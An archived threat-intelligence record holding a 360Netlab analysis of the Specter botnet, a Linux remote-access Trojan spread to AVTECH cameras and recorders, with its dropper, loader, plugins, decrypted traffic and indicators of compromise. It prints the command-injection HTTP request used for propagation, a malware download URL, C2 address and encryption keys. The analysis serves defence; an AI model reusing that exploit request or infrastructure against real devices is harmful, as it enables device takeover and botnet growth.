{
	"id": "6225988d-3ba0-475e-b8db-7c6ef029f298",
	"created_at": "2026-04-06T00:21:27.961458Z",
	"updated_at": "2026-04-10T03:30:57.076879Z",
	"deleted_at": null,
	"sha1_hash": "32503b0050a8e3b1756977e93e2e5bc3b741126c",
	"title": "Ghost in action: the Specter botnet",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 823396,
	"plain_text": "Ghost in action: the Specter botnet\r\nBy Alex.Turing\r\nPublished: 2020-09-25 · Archived: 2026-04-05 12:50:12 UTC\r\nBackground\r\nOn August 20, 2020, 360Netlab Threat Detect System captured a suspicious ELF file\r\n( 22523419f0404d628d02876e69458fbe.css )with 0 VT detection.\r\nWhen we took a close look, we see a new botnet that targets AVTECH IP Camera / NVR / DVR devices , and it has\r\nflexible configuration, highly modular / plugin, and uses TLS, ChaCha20, Lz4 to encrypt and compress network\r\ntraffic.\r\nThe ELF we captured is Dropper, it releases a loader, and the loader will send encrypted traffic requests various\r\nPlugins from C2 to perform different functions. The sample build path is /build/arm-specter-linux-uclibcgnueabi , that is why we named it Specter.\r\nAt present, Specter has a lot of unprofessional aspects . For example, it releases two libraries required by\r\nruntime while releasing Loader, but they are all dynamically linked.We also noticed that Plugin does not expand\r\nand load directly in memory.The vulnerability being targeted is also quite old, a 5 years old on. On the other hand,\r\nthis botnet has a good layered design, complex network communication and some other characteristics，which is\r\nobviously a work of professional. Professional aspects come with unprofessional aspects , this contradiction\r\nmakes us speculate that Specter is in the test development stage. We will see how it goes in the future.\r\nOverview\r\nSpecter is a remote control Trojan (RAT) for the Linux platform.\r\nIt consists of 3 parts, Dropper, Loader, and Plugin. The main function is determined by Loader\u0026Plugin. The main\r\nfunctions of Specter are\r\nFile management\r\nDownload and upload management\r\nShell service\r\nSocket5 Proxy\r\nReport device information\r\nExecute the script issued by C2\r\nExecuting C2 to deliver executable files\r\nhttps://blog.netlab.360.com/ghost-in-action-the-specter-botnet/\r\nPage 1 of 15\n\nThe basic process is shown in the figure below:\r\nPropagation\r\nSpecter spread its Dropper samples throughAVTECH IP Camera / NVR / DVR Devices vulnerabilities,The\r\npayload being used is as follows:\r\nGET /cgi-bin/nobody/Search.cgi?action=cgi_query\u0026ip=google.com\u0026port=80\u0026queryb64str=Lw==\u0026username=admin%20;XmlAp%\r\nHost: {}:4443\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0\r\nAccept-Language: en-US,en;q=0.8,zh-CN;q=0.7,zh;q=0.5,zh-TW;q=0.3,zh-HK;q=0.2\r\nContent-Type: text/plain; charset=utf-8\r\nSample analysis\r\nSpecter's infection process can be divided into 4 stages.，\r\nStage 0: Preliminary stage, spread through vulnerabilities, implant Dropper on the device\r\nStage 1: Dropper releases Loader\r\nStage 2: Loading stage, Loader loads Plugin\r\nStage 3: Plugin executes the instructions issued by C2\r\nStage1：Stage1: Release stage, Specter_Dropper analysis\r\nThe main function of the dropper is to detect the operating environment, decrypt the Loader, configure the Config,\r\nand finally release and start the Loader.\r\nhttps://blog.netlab.360.com/ghost-in-action-the-specter-botnet/\r\nPage 2 of 15\n\nMD5:a8400c378950084fc8ab80b8bb4e5b18\r\nELF 32-bit LSB executable, ARM, version 1 (SYSV), statically linked, stripped\r\nPacker:No\r\n1.1 Decrypt Loader\r\nDecryption algorithm:XOR byte by byte 0x79 , then negate.\r\nAlong with the loaders, the runtime library, libc.so.0 and ld-uClibc.so.1 are also decrypted.Currently these\r\ntwo libraries have no malicious functions, but we speculate that future versions will hijack some functions of these\r\ntwo libraries to hide the existence of Specter from file, process and networks’ perspectives\r\n1.2 Configure Config\r\nLook for the written position mark in the Loader sample SpctCF , and then write Config at its subsequent\r\naddress.。\r\nThe comparison is as follows:\r\nhttps://blog.netlab.360.com/ghost-in-action-the-specter-botnet/\r\nPage 3 of 15\n\n1.3 Release and execute Loader\r\nRelease Loader to the /tmp/runtimes/hw_ex_watchdog file and run it, and later on delete itself to clean up the\r\ntraces of Dropper。\r\nStage2: Loading stage, Specter_Loader analysis\r\nThe main function of Loader is to decrypt Config, obtain C2 from it, establish encrypted communication with C2,\r\nand execute the instructions issued by C2. If there is no Plugin for processing the corresponding instructions, it\r\nwill request the required Plugin from C2.\r\nMD5:470a092abd67e25463425b611088b1db\r\nELF 32-bit LSB executable, ARM, version 1 (SYSV), dynamically linked (uses shared libs), stripped\r\nPacker:No\r\n2.1 Decrypt Config\r\nThere are C2, mutex name, nonce and other information in the Config file, ChaCha20 encryption is used, where\r\nthe key is CsFg34HbrJsAx6hjBmxDd7A2Wj0Cz9s\\x00 and the number of rounds is 15 .\r\nhttps://blog.netlab.360.com/ghost-in-action-the-specter-botnet/\r\nPage 4 of 15\n\nThe detailed Config structure is shown below:，\r\nTake the Config in the above figure as an example, the nonce (12 bytes) required for decryption is:\r\nc1 f5 9e 20 7a 35 9d 25 ed 77 bb 70\r\nThe ciphertext is:\r\n94 69 CA D5 A0 0F 73 A9 BB 05 71 B2 31 1D EF 06\r\n1A 2A BC 94 3A A7 4B 72 3A 0C BC 8E BF 57 1E 69\r\n88 1B A1 7D FB 79 6C 26 A9 95 EB B1 E9 53 A9 2B\r\n33 3D A7 F6 D2 07 E4 64 FD 70 81 C2 83 C2 A1 5F\r\n13 EB 3F 9C 6F CD 03 50 84 C5 5C 9C 31 B1 9F CF\r\n06 4B 5F 12 E9 C3 39 C3 EE 07 C5 CE E2 C2 58 FA\r\n6C AA 6D 9B 00 C2 37 3E C2 98 52 47 D4 4D E7\r\nAfter decryption, we get the following plaintext, we can see that C2 is 107.182.186.195 and mutex is fb4mi5a\r\n00000000 f4 36 ce 57 b0 46 d2 96 27 1c a6 88 fe 57 e2 22 |ô6ÎW°FÒ.'.¦.þWâ\"|\r\n00000010 52 34 19 f0 40 4d 62 8d 02 87 6e 69 45 8f be 6a |R4.ð@Mb...niE.¾j|\r\n00000020 66 62 34 6d 69 35 61 00 01 00 00 00 0f 00 00 00 |fb4mi5a.........|\r\n00000030 31 30 37 2e 31 38 32 2e 31 38 36 2e 31 39 35 03 |107.182.186.195.|\r\n00000040 00 00 00 34 34 33 01 00 00 00 01 00 00 00 01 00 |...443..........|\r\n00000050 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 |................|\r\n00000060 00 00 01 00 00 00 1e 00 5a 00 14 00 3c 00 00 |........Z...\u003c..|\r\nhttps://blog.netlab.360.com/ghost-in-action-the-specter-botnet/\r\nPage 5 of 15\n\n2.2 Establish communication with C2\r\nThe communication process can be divided into 4 stages, using TLS, ChaCha20 encryption algorithm, lz4\r\ncompression algorithm to ensure the security of data communication.The first stage is to establish a TLS\r\nconnection, the second stage is the process of mutual agreement authentication, the third stage is the Loader\r\nreporting device information, and the fourth stage executes the C2 issuing instruction process.\r\nTLS communication\r\nIn order to analyze the network traffic, we performed a Man-in-the-middle attack,and can see the result as follows.\r\nIt can be seen that Specter's network communication packet has a fixed format.\r\nPackets can be divided into four parts, the detailed structure is shown below:，\r\nWhere Encrypted Payload_info stores the payload verification, length, ID and other info.\r\n[Encrypted?]Compressed Payload is the payload itself, the payload will only be compressed during the key\r\nexchange stage, while in all the other stages it gets both encrypted and compressed.\r\nhttps://blog.netlab.360.com/ghost-in-action-the-specter-botnet/\r\nPage 6 of 15\n\nLet’s take a look at the above figure, the data packet that Bot sends to C2 for secret key exchange\r\nThe encryption algorithm used in the first part( ncrypted Payload_info ) is:\r\nChaCha20\r\nKey: 36 30 30 64 65 33 31 39 61 32 66 38 31 39 62 34\r\n61 38 35 31 64 32 33 66 63 34 62 33 33 33 33 65\r\nNonce: E7 66 29 FB 10 98 F6 5A 80 80 FF 58\r\nThe ciphertext is:\r\n0F 41 01 FD 8B 75 6C A2 20 31 DC 35 70 D9 4D 3B 8E 53 4D E9\r\nafter decryption:\r\nC9 3E 00 00 00 00 00 00 00 00 01 00 22 00 00 00 20 00 00 00\r\n3EC9 ---- CRC16 of Payload\r\n0001 ---- Cmd Id\r\n00000022 Compressed Payload length\r\n00000020 Decomressed Payload length\r\nThe value of Cmd Id is 1, indicating that it is in the key exchange stage, directly decompress\r\n[Encrypted?]Compressed Payload and get the key sent by Bot to C2\r\n01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10\r\n11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20\r\nAuthentication\r\nThe protocol authentication process can be divided into two stages, the first stage is the key exchange, and the\r\nsecond stage is the mutual recognition of identity.\r\nhttps://blog.netlab.360.com/ghost-in-action-the-specter-botnet/\r\nPage 7 of 15\n\nAccording to the data packet decryption process introduced above, we will get.\r\nThe secret key sent by Bot to C2 is:\r\n01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10\r\n11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20\r\nThe secret key sent by C2 to Bot is:\r\n19 F8 7C 62 7B 8D A2 B3 59 FD AE 25 4C 18 F7 33\r\n96 B5 D9 F5 EC FF C2 07 C3 7C 87 53 AE 60 99 2C\r\nIn the secret key exchange phase, the payload is only compressed without encryption; after the secret key is\r\nexchanged, Bot and C2 encrypt and compress the payload with each other's secret key.\r\nIt can be solved with the above secret key.\r\nThe authentication information sent by Bot to C2 is:\r\n00000000: 44 48 6E 37-34 73 64 50-4F 71 6E 53-64 32 35 39 DHn74sdPOqnSd259\r\nThe authentication information sent by C2 to Bot is:\r\n00000000: 6C 30 53 4F-38 68 46 55-78 62 56 73-64 74 51 34 l0SO8hFUxbVsdtQ4\r\nhttps://blog.netlab.360.com/ghost-in-action-the-specter-botnet/\r\nPage 8 of 15\n\nThis is consistent with the implementation we saw in the sample:\r\n2.3 Report device information, such as MAC/IP address, system type, etc.\r\n2.4 Execute the start Plugin command issued by C2\r\nhttps://blog.netlab.360.com/ghost-in-action-the-specter-botnet/\r\nPage 9 of 15\n\nSpecter implements a very flexible plugin management communication mechanism, each plugin must implement\r\nthe following 4 methods,\r\nhttps://blog.netlab.360.com/ghost-in-action-the-specter-botnet/\r\nPage 10 of 15\n\nIf there is no corresponding Plugin currently, a request is made to C2 and finally dynamically loaded into Loader\r\nPlugin Slot .\r\nStage3: Specter_Plugin analysis\r\nWhen the bot gets the Plugin issued by C2, it cannot be used directly, because they are encrypted and can only be\r\nloaded into the Plugin Slot for use after decryption.\r\nDecryption algorithm: XOR 0x7f byte by byte, then negate\r\nHere are some plugins we captured:\r\nShell plugin\r\nPlugin id: 1\r\nc7bf33d159597f55dce31b33a58d52de\r\nELF 32-bit LSB shared object, ARM, version 1 (SYSV), not stripped\r\nhttps://blog.netlab.360.com/ghost-in-action-the-specter-botnet/\r\nPage 11 of 15\n\nThe main function of Shell plugin is to create SHELL service.\r\nFile plugin\r\nPlugin id: 2\r\ne67db6449c18b2e552786df7718a33c8\r\nELF 32-bit LSB shared object, ARM, version 1 (SYSV), not stripped\r\nThe main function of the File plugin is file management. In addition to supporting read, write, delete, and search\r\noperations on file directories, it may also download/upload files from a designated server.\r\nhttps://blog.netlab.360.com/ghost-in-action-the-specter-botnet/\r\nPage 12 of 15\n\nSocket Plugin\r\nPlugin id: 3\r\n45c5e7bcb9987356b53fd9a78543dcda\r\nhttps://blog.netlab.360.com/ghost-in-action-the-specter-botnet/\r\nPage 13 of 15\n\nELF 32-bit LSB shared object, ARM, version 1 (SYSV), not stripped\r\nThe main function of Socket Plugin is to start Socket5 proxy.\r\nSSF Plugin\r\nPlugin id: 5\r\nda0f9a21ae7ee3d15794946ca74a07e3\r\nELF 32-bit LSB shared object, ARM, version 1 (SYSV), stripped\r\nThe main function of SSF Plugin is to download an executable file from a specified server to a local\r\n/tmp/runtimes/httpd_log_output file, and then execute it.。\r\nSuggestions\r\nWe recommend that readers monitor and block Specter related IP, URL and samples.\r\n联系我们\r\nReaders are always welcomed to reach us on twitter , WeChat 360Netlab or email to netlab at 360 dot cn.\r\nIoC\r\nhttps://blog.netlab.360.com/ghost-in-action-the-specter-botnet/\r\nPage 14 of 15\n\nCC\r\n107.182.186.195:443 ASN25820|IT7_Networks_Inc United_States|California|Los_Angeles\r\nSample MD5\r\n04c7ef9e4197985d31e5d601a9161c5e\r\n052b6fce24a800259289e2f06163db57\r\n065d942effb6010bb48f7403d3ad442b\r\n0d0bf23412bd34c82ab28e67278519bf\r\n2b89fd69d128c8a28425c512670e531a\r\n2ed27722e095b1c870fdb10e4990db0f\r\n42d341d0b76869abc2231c70d0f0ecc9\r\n5e03c99153ed59546bf60c9f896a30f1\r\n7377eedb6512743858d52da3cc028a33\r\n7c59ddc06da158afc8b514a9a81ffd36\r\na5ded8b31b17c88302882cccc35cc28f\r\na8400c378950084fc8ab80b8bb4e5b18\r\na99563e6711990b9b3f542ae146bd01c\r\nacfa5f547b69bde0bf3f343429594b99\r\nb79639e2b5d10f92ea44721e155fc09b\r\nb9ac3d23faba205f74ebd932d8e370d3\r\nc2126977f9f482f290154ea21719330f\r\nc33b585a0dfa5fdb70d27a17ace6ba1f\r\nc51fc1656aa857bb7226e2df969aa72d\r\ncc1b11c6ac6e5bebc4c0e7502b4e1fcd\r\ncc27d6141f8c66e520122e8f2292a940\r\neda6d2b0837b5e78ae1b0b50f85e3321\r\nDownloader\r\nhttp://45.76.70.163:80/style/22523419f0404d628d02876e69458fbe.css\r\nSource: https://blog.netlab.360.com/ghost-in-action-the-specter-botnet/\r\nhttps://blog.netlab.360.com/ghost-in-action-the-specter-botnet/\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.netlab.360.com/ghost-in-action-the-specter-botnet/"
	],
	"report_names": [
		"ghost-in-action-the-specter-botnet"
	],
	"threat_actors": [
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434887,
	"ts_updated_at": 1775791857,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/32503b0050a8e3b1756977e93e2e5bc3b741126c.pdf",
		"text": "https://archive.orkl.eu/32503b0050a8e3b1756977e93e2e5bc3b741126c.txt",
		"img": "https://archive.orkl.eu/32503b0050a8e3b1756977e93e2e5bc3b741126c.jpg"
	}
}